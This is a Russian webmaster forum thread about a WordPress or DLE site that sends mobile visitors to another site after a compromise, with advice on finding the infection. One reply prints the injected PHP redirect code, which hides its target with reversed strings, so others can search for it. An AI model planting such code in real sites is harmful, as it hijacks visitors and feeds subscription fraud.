Помощник
|
Похоже на взлом, Редирект мобильных на WP |
GET_ini
|
Сообщение
#1
|
||
|
|
||
|
|||
medved112 |
15.1.2014, 0:52;
Ответить: medved112
Сообщение
#2
|
|
Файл .htaccess смотрите
-------------------- |
|
|
GET_ini
|
Сообщение
#3
|
|
medved112, все чисто...
П.С WP последняя версия... |
|
|
jack |
15.1.2014, 1:34;
Ответить: jack
Сообщение
#4
|
|
GET_ini, у меня было такое. Ищите последние изенённые файлы, зараза там сидит (это и файлы шаблона могут быть и скрипты в папке темы и всё что угодно)
-------------------- |
|
|
ManGysITI |
15.1.2014, 1:41;
Ответить: ManGysITI
Сообщение
#5
|
|
мало найти заразу, нужно выяснить как она попала на сайт и закрыть эту дырку.
-------------------- Качественный копирайт заказываю здесь. |
|
|
Tollun |
15.1.2014, 3:08;
Ответить: Tollun
Сообщение
#6
|
|
часов пять назад чистил от действий именно этого товарища 3 DLE сайта,
дата изменения файлов 13.11.2013 18:15, судя по всему так долго на палили, но если у ТС те же цифры то просто скидывает на эти данные (подозреваю, это так, или чудесным образом мы в один день столкнулись с этим). Кстати для тех кто испытает сложности в поиске рекомендую запустить нормальный текстовый редактор умеющий искать в файлах (у меня EmEditor) и выполнить поиск, достаточно одной из строчек... $gant = strtolower($_SERVER[strrev(strtoupper('tnega_resu_ptth'))]);$ref = $_SERVER[strrev(strtoupper('tsoh_ptth'))]; if(!preg_match('/crawl|andex|oogle|bot/i',$gant)) { if((preg_match('/ndroi|htc_|htc-|okia|pera min|j2me|martph|pera mo|phone|peramob|ymbian/i',$gant)) and (!isset ($_COOKIE['dle_user_id'])) and($_SERVER['REQUEST_URI'] != '/')) {header(strrev('=REREFER_PTTH&1=ru&6?dom'.'/atsirk/'.'resu'.'/ten.'.'lx'.'ib'.'//:pt'.'th :noi'.'tac'.'oL').$ref);exit;}} А тем кто обиделся ищите чей платник flvs-updates.ru id 14316 ссылка на оферту infomobiles.net/oferta.php |
|
|
viston |
15.1.2014, 3:32;
Ответить: viston
Сообщение
#7
|
|
Я айболитом сайты про сканировал и у меня зараза была в php , фалов 15-20 на одном сайте где эта дрянь была.
|
|
|
andreykashops |
15.1.2014, 10:56;
Ответить: andreykashops
Сообщение
#8
|
|
У меня было дело запихнули подобный скрипт в сам jquery движка(просто вконец добавили), так-что там тоже стоит смотреть.
-------------------- |
|
|
Electric |
15.1.2014, 12:59;
Ответить: Electric
Сообщение
#9
|
|
Тему с паблика качали?
Возможно шелл посунули с дырявой темой. Если чистить, то нужно смотреть нет ли шеллов и бекдоров в темах. Попробуйте поиск по файлам base64_decode ... -------------------- |
|
|
vadimon |
15.1.2014, 22:15;
Ответить: vadimon
Сообщение
#10
|
|
Смотри файл index.php, который в корне сайта лежит.
-------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
взлом почты mail.ru | 14 | moonni | 7428 | 14.1.2013, 19:06 автор: -infohack.ru- |
|
Взлом админки. Кто сделает? | 6 | moonni | 4043 | 1.1.2013, 18:37 автор: -Den1xxx- |
Текстовая версия | Сейчас: 29.3.2024, 5:06 |